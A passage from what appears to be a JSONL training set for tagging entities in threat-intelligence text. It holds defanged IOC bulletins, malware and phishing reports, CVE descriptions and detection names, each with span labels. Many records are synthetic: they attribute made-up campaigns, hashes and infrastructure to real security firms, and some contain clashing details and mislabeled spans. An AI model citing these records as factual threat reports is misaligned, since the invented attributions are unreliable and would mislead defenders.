Trojan/Magania.eken Win32.Trojan.Farfli.ai Win32/Farfli.GKH Win.Trojan.Magania-19224 Trojan-GameThief.Win32.Magania.uagj Trojan.Win32.Magania.bvkxn Troj.W32.MMM.ljA2 Backdoor.Win32.Gh0st.g Trojan.Magania.Win32.38676 BKDR_INJECT.SMJ BehavesLike[.]Win32[.]Backdoor[.]cc Backdoor/IRCBot.qan Trojan.Barys.62 Trojan-GameThief.Win32.Magania.uagj Trojan/Win32.PcClient.R12944 TrojanPSW.Magania Win32/Farfli.AK Trojan.Farfli!czCLTsqt/Nw Backdoor.Win32.FirstInj Backdoor.Win32.Gh0st.BH", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.cc": [[334, 369]]}, "info": {"id": "cyner2_train_000797", "source": "defanged_augment"}} {"text": "Blog Post by Check Point Research: Tracking UNC2452's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2024-26162 against Windows Server 2019 deployments. The initial access vector involves spear-phishing emails from account@phishing-domain[ . ]com delivering IcedID. 
Post-compromise, the attackers deploy XLoader and use Certutil for reconnaissance. C2 infrastructure includes 172[.]204[.]32[.]225 and proxy-cache[.]com. A staging server at hxxps://securemail[ . ]org/callback hosts additional tooling. Key artifact: C:\\Program Files\\Common Files\\dropper.ps1 (MD5: 7dd06682833ede7f4f1b4e2fe2552a80).", "spans": {"Organization: Check Point Research": [[13, 33]], "Vulnerability: CVE-2024-26162": [[131, 145]], "System: Windows Server 2019": [[154, 173]], "Indicator: account@phishing-domain.com": [[249, 280]], "Malware: IcedID": [[292, 298]], "Malware: XLoader": [[338, 345]], "Indicator: 172.204.32.225": [[410, 430]], "Indicator: proxy-cache.com": [[435, 452]], "Indicator: https://securemail.org/callback": [[474, 509]], "Indicator: 7dd06682833ede7f4f1b4e2fe2552a80": [[598, 630]]}, "info": {"id": "synth_v2_01659", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Proofpoint identified a large-scale phishing operation. Emails originated from helpdesk@phishing-domain[.]com and noreply@auth-check[ . ]org, spoofing legitimate services. Victims were directed to hxxps://update-static[ . ]info/download/update.exe which hosted a credential harvesting page on dataauth[.]cc. A secondary link hxxp://relay-mail[.]cc/assets/js/payload.js delivered DarkSide (SHA256: 8aab0c3d27847582657c5321b5e0d3716223b4df94098b5057f868683f5b88c5). The malware was saved to C:\\Users\\admin\\AppData\\Local\\Temp\\implant.so and established C2 with 12 [ . ] 68 [ . ] 237 [ . 
] 90.", "spans": {"Organization: Proofpoint": [[26, 36]], "Indicator: helpdesk@phishing-domain.com": [[105, 135]], "Indicator: noreply@auth-check.org": [[140, 166]], "Indicator: https://update-static.info/download/update.exe": [[223, 273]], "Indicator: dataauth.cc": [[319, 332]], "Indicator: http://relay-mail.cc/assets/js/payload.js": [[351, 394]], "Malware: DarkSide": [[405, 413]], "Indicator: 8aab0c3d27847582657c5321b5e0d3716223b4df94098b5057f868683f5b88c5": [[423, 487]], "Indicator: 12.68.237.90": [[584, 614]]}, "info": {"id": "synth_v2_00994", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlib/alloc_tag: do not acquire non-existent lock in alloc_tag_top_users()\n\nalloc_tag_top_users() attempts to lock alloc_tag_cttype->mod_lock even\nwhen the alloc_tag_cttype is not allocated because:\n\n 1) alloc tagging is disabled because mem profiling is disabled\n (!alloc_tag_cttype)\n 2) alloc tagging is enabled, but not yet initialized (!alloc_tag_cttype)\n 3) alloc tagging is enabled, but failed initialization\n (!alloc_tag_cttype or IS_ERR(alloc_tag_cttype))\n\nIn all cases, alloc_tag_cttype is not allocated, and therefore\nalloc_tag_top_users() should not attempt to acquire the semaphore.\n\nThis leads to a crash on memory allocation failure by attempting to\nacquire a non-existent semaphore:\n\n Oops: general protection fault, probably for non-canonical address 0xdffffc000000001b: 0000 [#3] SMP KASAN NOPTI\n KASAN: null-ptr-deref in range [0x00000000000000d8-0x00000000000000df]\n CPU: 2 UID: 0 PID: 1 Comm: systemd Tainted: G D 6.16.0-rc2 #1 VOLUNTARY\n Tainted: [D]=DIE\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\n RIP: 0010:down_read_trylock+0xaa/0x3b0\n Code: d0 7c 08 84 d2 0f 85 a0 02 00 00 8b 0d df 31 dd 04 85 c9 75 29 48 b8 00 00 00 00 00 fc ff df 48 8d 6b 68 48 89 ea 48 c1 ea 03 <80> 3c 02 00 0f 85 88 02 00 00 48 3b 5b 68 0f 85 53 01 00 00 65 
ff\n RSP: 0000:ffff8881002ce9b8 EFLAGS: 00010016\n RAX: dffffc0000000000 RBX: 0000000000000070 RCX: 0000000000000000\n RDX: 000000000000001b RSI: 000000000000000a RDI: 0000000000000070\n RBP: 00000000000000d8 R08: 0000000000000001 R09: ffffed107dde49d1\n R10: ffff8883eef24e8b R11: ffff8881002cec20 R12: 1ffff11020059d37\n R13: 00000000003fff7b R14: ffff8881002cec20 R15: dffffc0000000000\n FS: 00007f963f21d940(0000) GS:ffff888458ca6000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007f963f5edf71 CR3: 000000010672c000 CR4: 0000000000350ef0\n Call Trace:\n \n codetag_trylock_module_list+0xd/0x20\n alloc_tag_top_users+0x369/0x4b0\n __show_mem+0x1cd/0x6e0\n warn_alloc+0x2b1/0x390\n __alloc_frozen_pages_noprof+0x12b9/0x21a0\n alloc_pages_mpol+0x135/0x3e0\n alloc_slab_page+0x82/0xe0\n new_slab+0x212/0x240\n ___slab_alloc+0x82a/0xe00\n \n\nAs David Wang points out, this issue became easier to trigger after commit\n780138b12381 (\"alloc_tag: check mem_profiling_support in alloc_tag_init\").\n\nBefore the commit, the issue occurred only when it failed to allocate and\ninitialize alloc_tag_cttype or if a memory allocation fails before\nalloc_tag_init() is called. After the commit, it can be easily triggered\nwhen memory profiling is compiled but disabled at boot.\n\nTo properly determine whether alloc_tag_init() has been called and its\ndata structures initialized, verify that alloc_tag_cttype is a valid\npointer before acquiring the semaphore. If the variable is NULL or an\nerror value, it has not been properly initialized. In such a case, just\nskip and do not attempt to acquire the semaphore.\n\n[harry.yoo@oracle[ . 
]com: v3]", "spans": {"Indicator: oracle.com": [[3090, 3104]], "System: Linux kernel": [[7, 19]], "System: systemd": [[994, 1001]], "System: QEMU": [[1092, 1096]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-38517"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Mimikatz artifacts at /var/tmp/agent.py. Memory dump analysis confirmed execution of Covenant. Registry modifications pointed to persistence via /usr/local/bin/chrome_helper.exe. Network forensics identified connections to 220[.]160[.]183[.]128 and sync-gateway[.]xyz. Email headers traced the initial vector to contact@secure-verify[.]net. File /dev/shm/taskhost.exe (MD5: 0be6383fdc3e9ae48b1d8a47606bc5a6) was identified as the initial dropper. A staging URL hxxps://loginapi[.]top/assets/js/payload.js resolved to 172 [ . ] 221 [ . ] 118 [ . ] 45. Secondary artifact hash: SHA1: d37d89f867324261d0e44634f39529788fd32387.", "spans": {"Indicator: 220.160.183.128": [[295, 316]], "Indicator: sync-gateway.xyz": [[321, 339]], "Indicator: contact@secure-verify.net": [[384, 411]], "Indicator: 0be6383fdc3e9ae48b1d8a47606bc5a6": [[446, 478]], "Indicator: https://loginapi.top/assets/js/payload.js": [[533, 576]], "Indicator: 172.221.118.45": [[589, 621]], "Indicator: d37d89f867324261d0e44634f39529788fd32387": [[654, 694]]}, "info": {"id": "synth_v2_01216", "source": "defanged_augment"}} {"text": "Malware Analysis Report: BlackCat (SHA1: 4badc3fe5d500a0ee06b28a7b79ac9522412317b). Upon execution on VMware ESXi, the sample creates C:\\Windows\\System32\\ntds.dit and injects into legitimate processes. Network analysis shows beaconing to 63[.]72[.]8[.]231 every 60 seconds and DNS queries to relay-sync[.]online. The second stage was fetched from hxxp://relayrelay[.]tech/gate.php and written to C:\\Users\\admin\\AppData\\Local\\Temp\\helper.sh. The payload uses CrackMapExec-style techniques for defense evasion. 
A secondary hash (MD5: da078f267320b633160e8c1632de0e61) was extracted from the unpacked payload.", "spans": {"Malware: BlackCat": [[25, 33]], "Indicator: 4badc3fe5d500a0ee06b28a7b79ac9522412317b": [[41, 81]], "System: VMware ESXi": [[102, 113]], "Indicator: 63.72.8.231": [[238, 255]], "Indicator: relay-sync.online": [[292, 311]], "Indicator: hxxp://relayrelay.tech/gate.php": [[347, 380]], "Indicator: da078f267320b633160e8c1632de0e61": [[532, 564]]}, "info": {"id": "synth_v2_00602", "source": "defanged_augment"}} {"text": "IOC Bulletin - BumbleBee Campaign:\nNetwork Indicators:\n- 172 [ . ] 243 [ . ] 112 [ . ] 126\n- 91[.]175[.]131[.]113\n- 17[.]224[.]65[.]114\n- proxydata[.]tech\n- backupedge[ . ]dev\nURLs:\n- hxxp://authsecure[.]dev/callback\n- hxxp://authstorage[.]dev/collect\nEmail Senders:\n- billing@document-share[ . ]link\n- noreply@document-share[ . ]link\nFile Indicators:\n- SHA256: 67778e4a7cc0aa37fc999dcd453d3acc97e4263a659a45f4536a2dc088581cb5\n- MD5: 0957fcf13fb365823854fec6542ee5b4\n- Drop path: /usr/local/bin/config.dat", "spans": {"Malware: BumbleBee": [[15, 24]], "Indicator: 172.243.112.126": [[57, 90]], "Indicator: 91.175.131.113": [[93, 113]], "Indicator: 17.224.65.114": [[116, 135]], "Indicator: proxydata.tech": [[138, 154]], "Indicator: backupedge.dev": [[157, 175]], "Indicator: http://authsecure.dev/callback": [[184, 216]], "Indicator: hxxp://authstorage.dev/collect": [[219, 251]], "Indicator: billing@document-share.link": [[269, 300]], "Indicator: noreply@document-share.link": [[303, 334]], "Indicator: 67778e4a7cc0aa37fc999dcd453d3acc97e4263a659a45f4536a2dc088581cb5": [[362, 426]], "Indicator: 0957fcf13fb365823854fec6542ee5b4": [[434, 466]]}, "info": {"id": "synth_v2_01425", "source": "defanged_augment"}} {"text": "Malware Analysis Report: WarmCookie (SHA1: b8be3f9d1120996537073d8c2087373051aeabb3). Upon execution on Active Directory, the sample creates /var/tmp/beacon.dll and injects into legitimate processes. 
Network analysis shows beaconing to 200 [ . ] 59 [ . ] 120 [ . ] 237 every 60 seconds and DNS queries to edgestorage[.]org. The second stage was fetched from hxxps://update-gateway[ . ]net/admin/config and written to C:\\Windows\\Temp\\taskhost.exe. The payload uses CrackMapExec-style techniques for defense evasion. A secondary hash (SHA1: 8b171cfa4962ff8f7bb0261df6fe81ad2c86117b) was extracted from the unpacked payload.", "spans": {"Malware: WarmCookie": [[25, 35]], "Indicator: b8be3f9d1120996537073d8c2087373051aeabb3": [[43, 83]], "System: Active Directory": [[104, 120]], "Indicator: 200.59.120.237": [[236, 268]], "Indicator: edgestorage.org": [[305, 322]], "Indicator: https://update-gateway.net/admin/config": [[358, 401]], "Indicator: 8b171cfa4962ff8f7bb0261df6fe81ad2c86117b": [[539, 579]]}, "info": {"id": "synth_v2_00620", "source": "defanged_augment"}} {"text": "Malware Analysis Report: RemcosRAT (SHA256: 38ad20887d2715778f071a6cc5a0528469f6a883e242d9f68a10a32c3858d660). Upon execution on F5 BIG-IP, the sample creates /opt/app/bin/winlogon.exe and injects into legitimate processes. Network analysis shows beaconing to 124[.]176[.]96[.]161 every 60 seconds and DNS queries to relaycloud[ . ]online. The second stage was fetched from hxxps://edgerelay[ . ]net/admin/config and written to C:\\Users\\admin\\Downloads\\backdoor.elf. The payload uses Hashcat-style techniques for defense evasion. 
A secondary hash (SHA1: dd008052b4ed983e7fd1aa5891fd930232661f7a) was extracted from the unpacked payload.", "spans": {"Malware: RemcosRAT": [[25, 34]], "Indicator: 38ad20887d2715778f071a6cc5a0528469f6a883e242d9f68a10a32c3858d660": [[44, 108]], "System: F5 BIG-IP": [[129, 138]], "Indicator: 124.176.96.161": [[260, 280]], "Indicator: relaycloud.online": [[317, 338]], "Indicator: https://edgerelay.net/admin/config": [[374, 412]], "Indicator: dd008052b4ed983e7fd1aa5891fd930232661f7a": [[554, 594]]}, "info": {"id": "synth_v2_00501", "source": "defanged_augment"}} {"text": "A backdoor also known as: Riskware.Confuser! Trojan.Win32.SteamBurglar.dmdrlr Trojan.SteamBurglar.621 Trojan.Katusha.Win32.39398 BehavesLike[ . ]Win32[ . ]Backdoor[ . ]cc TR/Confuser.181248 MSIL/Injector.LTM!tr PWS:MSIL/Stimilini.C Trj/CI.A Trojan.MSIL.Stimilik MSIL6.AKRX Trojan.MSIL.Stimilik.DT", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.cc": [[129, 170]]}, "info": {"id": "cyner2_train_005764", "source": "defanged_augment"}} {"text": "The Play ransomware group has targeted organizations using CVE-2022-41040 and CVE-2022-41082 in Microsoft Exchange Server, collectively known as ProxyNotShell. After exploitation, the actors deployed a webshell at C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx. The ransomware encrypted files with the .play extension. FBI investigation uncovered command and control infrastructure at 45[.]76[.]172[.]198 and 64 [ . ] 190 [ . ] 113 [ . ] 52. 
Encrypted DNS over HTTPS was used to evade detection.", "spans": {"Malware: Play": [[4, 8]], "Vulnerability: CVE-2022-41040": [[59, 73]], "Vulnerability: CVE-2022-41082": [[78, 92]], "System: Microsoft Exchange Server": [[96, 121]], "Organization: FBI": [[319, 322]], "Indicator: 45.76.172.198": [[385, 404]], "Indicator: 64.190.113.52": [[409, 440]]}, "info": {"id": "cisa_00029", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2022-32541 is a critical null pointer dereference affecting Palo Alto PAN-OS. Google TAG confirmed active exploitation by Turla in the wild. Exploitation delivers Emotet (SHA1: 6ffd0536fe3267b8116f4f2fb2cc647326325d14) which is dropped to C:\\Windows\\Temp\\chrome_helper.exe. The exploit payload is hosted at hxxp://cdn-auth[.]com/wp-content/uploads/doc.php and communicates to 192 [ . ] 108 [ . ] 85 [ . ] 38 for C2.", "spans": {"Vulnerability: CVE-2022-32541": [[24, 38]], "Vulnerability: null pointer dereference": [[53, 77]], "System: Palo Alto PAN-OS": [[88, 104]], "Organization: Google TAG": [[106, 116]], "Malware: Emotet": [[191, 197]], "Indicator: 6ffd0536fe3267b8116f4f2fb2cc647326325d14": [[205, 245]], "Indicator: hxxp://cdn-auth.com/wp-content/uploads/doc.php": [[335, 383]], "Indicator: 192.108.85.38": [[404, 435]]}, "info": {"id": "synth_v2_00769", "source": "defanged_augment"}} {"text": "Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza[ . ]r23 :", "spans": {"Indicator: Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.r23": [[0, 60]]}, "info": {"id": "cyberner_stix_train_007331", "source": "defanged_augment"}} {"text": "The Bumblebee loader contacts three staging URLs: hxxps://loader-bin[[.]]work/download/payload.exe, hxxp://share-files[[.]]biz/gate.php, and hxxps://token-auth[[ . ]]space/api/beacon. The final payload (SHA256: 0dca123ba69c7c94a793d25435d3a271d9c66b68f6a5b90b3454a57293902f5d) is downloaded and executed. Fallback C2 is at 159 [ . ] 65 [ . ] 60 [ . 
] 31.", "spans": {"Malware: Bumblebee": [[4, 13]], "Indicator: hxxps://loader-bin[.]work/download/payload.exe": [[50, 98]], "Indicator: hxxp://share-files[.]biz/gate.php": [[100, 135]], "Indicator: hxxps://token-auth[.]space/api/beacon": [[141, 182]], "Indicator: 0dca123ba69c7c94a793d25435d3a271d9c66b68f6a5b90b3454a57293902f5d": [[211, 275]], "Indicator: 159.65.60.31": [[323, 353]]}, "info": {"id": "synth_00099", "source": "defanged_augment"}} {"text": "At the time of writing this research , four versions of the EventBot malware were observed : Version 0 [ . ] 0 [ . ] 0 [ . ] 1 , 0[.]0[.]0[.]2 , and 0[.]3[.]0[.]1 and 0[.]4[.]0[.]1 . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . In December 2015 , Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload .", "spans": {"Malware: EventBot": [[60, 68]], "Malware: sample": [[199, 205]], "Organization: Unit 42": [[344, 351]], "Malware: Emissary Trojan": [[410, 425]], "Indicator: 0.0.0.1": [[101, 126]], "Indicator: 0.0.0.2": [[129, 142]], "Indicator: 0.3.0.1": [[149, 162]], "Indicator: 0.4.0.1": [[167, 180]]}, "info": {"id": "cyberner_stix_train_000444", "source": "defanged_augment"}} {"text": "In Version 0[.]0[.]0[.]1 , the communication with the C2 is encrypted using Base64 and RC4 . Development of Bemstour has continued into 2019 . One payload was a Python based open source remote administration tool ( RAT ) called Pupy .", "spans": {"Malware: Bemstour": [[108, 116]], "Malware: remote administration tool": [[186, 212]], "Malware: RAT": [[215, 218]], "Malware: Pupy": [[228, 232]], "Indicator: 0.0.0.1": [[11, 24]]}, "info": {"id": "cyberner_stix_train_006321", "source": "defanged_augment"}} {"text": "Tenable detected a multi-stage attack chain. The initial phishing email from ceo@phishing-domain[.]com contained a link to hxxp://backupapi[ . ]net/secure/token. 
This redirected to hxxps://relay-gateway[.]link/collect on cdn-relay[ . ]net. A secondary email from it@account-update[ . ]xyz pointed to hxxp://relaysecure[ . ]club/assets/js/payload.js which delivered Amadey. The final payload callback was hxxp://cloudcloud[.]cc/panel/index.html resolving to 10[.]48[.]33[.]37 via static-backup[ . ]online.", "spans": {"Organization: Tenable": [[0, 7]], "Indicator: ceo@phishing-domain.com": [[77, 102]], "Indicator: hxxp://backupapi.net/secure/token": [[123, 160]], "Indicator: https://relay-gateway.link/collect": [[181, 217]], "Indicator: cdn-relay.net": [[221, 238]], "Indicator: it@account-update.xyz": [[263, 288]], "Indicator: http://relaysecure.club/assets/js/payload.js": [[300, 348]], "Malware: Amadey": [[365, 371]], "Indicator: http://cloudcloud.cc/panel/index.html": [[404, 443]], "Indicator: 10.48.33.37": [[457, 474]], "Indicator: static-backup.online": [[479, 503]]}, "info": {"id": "synth_v2_01831", "source": "defanged_augment"}} {"text": "IOC Bulletin - FormBook Campaign:\nNetwork Indicators:\n- 192 [ . ] 100 [ . ] 201 [ . ] 206\n- 36 [ . ] 220 [ . ] 185 [ . ] 215\n- 172 [ . ] 234 [ . ] 97 [ . ] 112\n- cachestatic[ . ]dev\n- api-update[ . ]org\nURLs:\n- hxxps://static-cdn[ . ]top/assets/js/payload.js\n- hxxp://update-cloud[.]io/download/update.exe\nEmail Senders:\n- alert@account-update[ . ]xyz\n- alert@auth-check[ . 
]org\nFile Indicators:\n- SHA1: 23dc382b600a69f4ef7bcb10b99a5ac3b6e8a490\n- MD5: c3318098c6d5d76e6febb40abef2dc59\n- Drop path: C:\\ProgramData\\shell.php", "spans": {"Malware: FormBook": [[15, 23]], "Indicator: 192.100.201.206": [[56, 89]], "Indicator: 36.220.185.215": [[92, 124]], "Indicator: 172.234.97.112": [[127, 159]], "Indicator: cachestatic.dev": [[162, 181]], "Indicator: api-update.org": [[184, 202]], "Indicator: https://static-cdn.top/assets/js/payload.js": [[211, 258]], "Indicator: http://update-cloud.io/download/update.exe": [[261, 305]], "Indicator: alert@account-update.xyz": [[323, 351]], "Indicator: alert@auth-check.org": [[354, 378]], "Indicator: 23dc382b600a69f4ef7bcb10b99a5ac3b6e8a490": [[404, 444]], "Indicator: c3318098c6d5d76e6febb40abef2dc59": [[452, 484]]}, "info": {"id": "synth_v2_01422", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Cisco Talos identified a large-scale phishing operation. Emails originated from support@auth-check[.]org and info@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxps://mailsync[ . ]tech/download/update.exe which hosted a credential harvesting page on backupupdate[ . ]org. A secondary link hxxps://sync-backup[ . ]info/panel/index.html delivered Hive (SHA1: 6be675b404f934eb4372c1c4b5c503471d73e6e8). The malware was saved to C:\\Program Files\\Common Files\\dropper.ps1 and established C2 with 5 [ . ] 119 [ . ] 162 [ . 
] 211.", "spans": {"Organization: Cisco Talos": [[26, 37]], "Indicator: support@auth-check.org": [[106, 130]], "Indicator: info@identity-verify.cc": [[135, 162]], "Indicator: hxxps://mailsync.tech/download/update.exe": [[219, 264]], "Indicator: backupupdate.org": [[310, 330]], "Indicator: hxxps://sync-backup.info/panel/index.html": [[349, 394]], "Malware: Hive": [[405, 409]], "Indicator: 6be675b404f934eb4372c1c4b5c503471d73e6e8": [[417, 457]], "Indicator: 5.119.162.211": [[551, 582]]}, "info": {"id": "synth_v2_01012", "source": "defanged_augment"}} {"text": "**Dump Domain Registration Patterns:*From about 2015 to at least October 2018 possibly longer, IBM X-Force assesses that ITG08's POS malware used the same notable domain naming convention: all known dump domains used by FrameworkPOS and GratefulPOS contained the same base name -akamaitechnologies[ . ]com. In fact, all said domains are nearly identical looking to a legitimate Akamai content delivery network CDN domain, differing only by a single character replacing a .' 
with - .", "spans": {"Organization: **Dump Domain Registration Patterns:*From": [[0, 41]], "Organization: IBM X-Force": [[95, 106]], "Malware: ITG08's POS malware": [[121, 140]], "Malware: FrameworkPOS": [[220, 232]], "Malware: GratefulPOS": [[237, 248]], "System: content delivery network CDN": [[385, 413]], "Indicator: akamaitechnologies.com": [[279, 305]]}, "info": {"id": "cyner2_train_004081", "source": "defanged_augment"}} {"text": "We were able to collect a second delivery document that shared the Joohn author from the crash list ( Lion Air Boeing 737 )[.]docx document , as well as the 188[.]241[.]58[.]170 C2 IP to host its remote template .", "spans": {"Indicator: crash list ( Lion Air Boeing 737 ).docx": [[89, 130]], "Indicator: 188.241.58.170": [[157, 177]]}, "info": {"id": "cyberner_stix_train_007555", "source": "defanged_augment"}} {"text": "FireEye published a threat intelligence report linking Storm-0558 to a new campaign exploiting CVE-2023-28217 in Windows Server 2019. The attackers deployed DarkSide via PowerShell Empire, establishing C2 communication with 172[.]252[.]34[.]154 and proxyauth[ . ]tech. A secondary payload was downloaded from hxxps://sync-secure[.]cc/download/update.exe. The malware binary (MD5: 95974a7bf27e08ea33589fdb737c315f) was dropped to C:\\Windows\\Tasks\\payload.bin. Phishing emails were sent from it@account-update[.]xyz targeting enterprise users. 
A backup C2 server was identified at 149[.]246[.]223[.]223.", "spans": {"Organization: FireEye": [[0, 7]], "Vulnerability: CVE-2023-28217": [[95, 109]], "System: Windows Server 2019": [[113, 132]], "Malware: DarkSide": [[157, 165]], "Indicator: 172.252.34.154": [[224, 244]], "Indicator: proxyauth.tech": [[249, 267]], "Indicator: hxxps://sync-secure.cc/download/update.exe": [[309, 353]], "Indicator: 95974a7bf27e08ea33589fdb737c315f": [[380, 412]], "Indicator: it@account-update.xyz": [[490, 513]], "Indicator: 149.246.223.223": [[579, 600]]}, "info": {"id": "synth_v2_00241", "source": "defanged_augment"}} {"text": "IOC Bulletin - WarmCookie Campaign:\nNetwork Indicators:\n- 10 [ . ] 10 [ . ] 87 [ . ] 218\n- 140 [ . ] 224 [ . ] 90 [ . ] 134\n- 102[.]239[.]109[.]101\n- api-portal[.]xyz\n- update-edge[ . ]info\nURLs:\n- hxxp://proxy-secure[.]club/download/update.exe\n- hxxp://data-cloud[.]club/portal/verify\nEmail Senders:\n- report@phishing-domain[.]com\n- account@mail-service[ . ]info\nFile Indicators:\n- MD5: 156af39be9b520c4c110258bbfab84c6\n- SHA256: 6f2935cf8ab114370f34a59ea6a628c5afe4e5234d9627f368b5792b1bf83fa8\n- Drop path: /dev/shm/agent.py", "spans": {"Malware: WarmCookie": [[15, 25]], "Indicator: 10.10.87.218": [[58, 88]], "Indicator: 140.224.90.134": [[91, 123]], "Indicator: 102.239.109.101": [[126, 147]], "Indicator: api-portal.xyz": [[150, 166]], "Indicator: update-edge.info": [[169, 189]], "Indicator: http://proxy-secure.club/download/update.exe": [[198, 244]], "Indicator: http://data-cloud.club/portal/verify": [[247, 285]], "Indicator: report@phishing-domain.com": [[303, 331]], "Indicator: account@mail-service.info": [[334, 363]], "Indicator: 156af39be9b520c4c110258bbfab84c6": [[388, 420]], "Indicator: 6f2935cf8ab114370f34a59ea6a628c5afe4e5234d9627f368b5792b1bf83fa8": [[431, 495]]}, "info": {"id": "synth_v2_01483", "source": "defanged_augment"}} {"text": "Blog Post by Cisco Talos: Tracking Lazarus Group's Latest Operations. 
Our research team has uncovered a new campaign leveraging CVE-2021-24110 against Windows Server 2019 deployments. The initial access vector involves spear-phishing emails from service@phishing-domain[ . ]com delivering WarmCookie. Post-compromise, the attackers deploy XLoader and use Brute Ratel for reconnaissance. C2 infrastructure includes 91[.]53[.]140[.]72 and gatewaygateway[.]dev. A staging server at hxxp://static-gateway[ . ]link/assets/js/payload.js hosts additional tooling. Key artifact: C:\\ProgramData\\winlogon.exe (MD5: b47838070e7f78158b7f031cc072dcdf).", "spans": {"Organization: Cisco Talos": [[13, 24]], "Vulnerability: CVE-2021-24110": [[128, 142]], "System: Windows Server 2019": [[151, 170]], "Indicator: service@phishing-domain.com": [[246, 277]], "Malware: WarmCookie": [[289, 299]], "Malware: XLoader": [[339, 346]], "Indicator: 91.53.140.72": [[414, 432]], "Indicator: gatewaygateway.dev": [[437, 457]], "Indicator: http://static-gateway.link/assets/js/payload.js": [[479, 530]], "Indicator: b47838070e7f78158b7f031cc072dcdf": [[605, 637]]}, "info": {"id": "synth_v2_01688", "source": "defanged_augment"}} {"text": "The “ core ” module contacts the C & C server , trying to get a fresh list of applications to search for , or if that fails , use a default app list : whatsapp lenovo.anyshare.gps mxtech.videoplayer.ad jio[.]jioplay[.]tv jio.media.jiobeats jiochat.jiochatapp jio.join good.gamecollection opera.mini.native startv.hotstar meitu.beautyplusme domobile.applock touchtype.swiftkey flipkart.android cn.xender It is worth noting that attackers used the same compromised websites to spread Buhtrap as those that had been used for the Corkow Trojan . In later stages , Dexphot targets a few other system processes for process hollowing : svchost[ . ]exe , tracert[.]exe , and setup[.]exe . 
Enterprise T1078 Valid Accounts APT29 has used a compromised account to access an organization 's VPN infrastructure .", "spans": {"System: whatsapp": [[151, 159]], "Malware: Dexphot": [[560, 567]], "Indicator: svchost.exe": [[629, 644]], "Indicator: tracert.exe": [[647, 660]], "Indicator: setup.exe": [[667, 678]], "System: organization 's VPN infrastructure": [[763, 797]], "Indicator: jio.jioplay.tv": [[202, 220]]}, "info": {"id": "cyberner_stix_train_004832", "source": "defanged_augment"}} {"text": "TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation for `tf.raw_ops.BoostedTreesCreateEnsemble` can result in a use after free error if an attacker supplies specially crafted arguments. The [implementation](hxxps://github[ . ]com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/boosted_trees/resource_ops.cc#L55) uses a reference counted resource and decrements the refcount if the initialization fails, as it should. However, when the code was written, the resource was represented as a naked pointer but later refactoring has changed it to be a smart pointer. Thus, when the pointer leaves the scope, a subsequent `free`-ing of the resource occurs, but this fails to take into account that the refcount has already reached 0, thus the resource has been already freed. During this double-free process, members of the resource object are accessed for cleanup but they are invalid as the entire resource has been freed. We have patched the issue in GitHub commit 5ecec9c6fbdbc6be03295685190a45e7eee726ab. The fix will be included in TensorFlow 2.6.0. 
We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/boosted_trees/resource_ops.cc#L55": [[266, 414]], "Indicator: 5ecec9c6fbdbc6be03295685190a45e7eee726ab": [[1065, 1105]], "Organization: GitHub": [[1051, 1057]], "Vulnerability: use after free": [[171, 185]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-37652"}} {"text": "Fail2ban honeypot data from 2026-04-23 revealed 63 IP addresses conducting SSH brute-force attacks. Several IPs also probed for CVE-2024-6387, a critical OpenSSH vulnerability known as regreSSHion. Top attacking IPs included 218 [ . ] 92 [ . ] 0 [ . ] 107, 61 [ . ] 177 [ . ] 173 [ . ] 16, and 112[.]85[.]42[.]88. These IPs are associated with known botnet infrastructure originating from Chinese autonomous systems.", "spans": {"Vulnerability: CVE-2024-6387": [[128, 141]], "Indicator: 218.92.0.107": [[225, 255]], "Indicator: 61.177.173.16": [[257, 288]], "Indicator: 112.85.42.88": [[294, 312]], "Vulnerability: regreSSHion": [[185, 196]], "System: OpenSSH": [[154, 161]]}, "info": {"id": "otx_00032", "source": "defanged_augment"}} {"text": "Artifact Analysis for Royal campaign:\nStage 1 dropper at /tmp/payload.bin - SHA256: b0cfa2721a8b6a7309101bd87646148d837b4d6d6a8de32a78889ded4d9841f1\nStage 2 loader at /var/tmp/agent.py - SHA1: 646c44f1b445e2676eb8121bee8b1240c81ddcf1\nFinal payload at /opt/app/bin/helper.sh - SHA1: c54686ffee846c752987e1eb34720ae0ab396eff\nExfiltration module - SHA256: f7326c08024d3709fd6f6f0bc959382c9ba86fea13d7e4e87b3f634a17e71d31\nAll stages communicated with 107[.]82[.]67[.]199. 
